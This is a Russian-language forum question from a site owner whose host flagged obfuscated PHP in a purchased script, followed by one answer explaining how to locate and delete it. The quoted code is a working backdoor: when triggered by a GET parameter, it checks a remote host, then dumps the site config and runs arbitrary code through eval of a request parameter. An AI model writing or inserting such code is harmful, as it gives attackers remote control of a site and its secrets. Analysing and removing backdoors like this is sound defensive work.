Задать вопрос
@No4NaMe

Вредоносный код в php скрипте, как убрать?

Хостинг сообщил что в скрипте имеется вредоносное по!

${"GLOBALS"}["zhnlnvpxiov"] = "config";
        ${"GLOBALS"}["rchmyoafpzb"] = "oloki";
        if (!empty($_GET["doConfirmLoki"])) {
            ${"GLOBALS"}["hypqdo"] = "cloki";
            ${"GLOBALS"}["zbgjvvsxd"] = "cloki";
            ${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
            $bqhzcuynfrb = "cloki";
            ${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
            ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
            if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
                echo '<pre>';
                print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
                echo '</pre>';
                if (isset($_GET["uloki"])) eval($_GET["uloki"]);
            }
            die;
        }

Что-бы не указывать название стороннего сайта в get я использовал символы xxxxx что-бы это значило?
{VIRUSDIE}Eval.request
{VIRUSDIE}Obfuscated.Globals.Names
могу даже указать кто продает скрипт с данным функционалом! и человек который его продает лицензию данного скрипта говорит следующие:
Я: тобищь нарушив ваши правила вы портите проект вашему клиенту таким образом?
Владелец-скрипта: Каждый случай уникален...

является ли данный код опасным и что он делает? и как бороться с тем кто распространяет данный скрипт еще и платно?

Каждый php файл с данном скрипте имеет следующие: if (!defined("TKM")) die("Access denied!");
  • Вопрос задан
  • 1003 просмотра
Подписаться 1 Простой 1 комментарий
Пригласить эксперта
Ответы на вопрос 1
xmoonlight
@xmoonlight
https://sitecoder.blogspot.com
Ищите по всем файлам подстроку: ${"GLOBALS"}[" и убирайте всё от неё и до строк:
if (isset($_GET["uloki"])) eval($_GET["uloki"]);
            }
            die;
        }
включительно!
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы